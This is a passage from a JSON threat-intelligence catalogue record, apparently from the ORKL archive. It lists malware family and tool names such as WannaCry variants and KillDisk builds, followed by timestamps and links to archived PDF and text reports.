"VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434494, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f35c94bced01b50ed62c883f0a09ff211a24fa02.pdf", "text": "https://archive.orkl.eu/f35c94bced01b50ed62c883f0a09ff211a24fa02.txt", "img": "https://archive.orkl.eu/f35c94bced01b50ed62c883f0a09ff211a24fa02.jpg" } }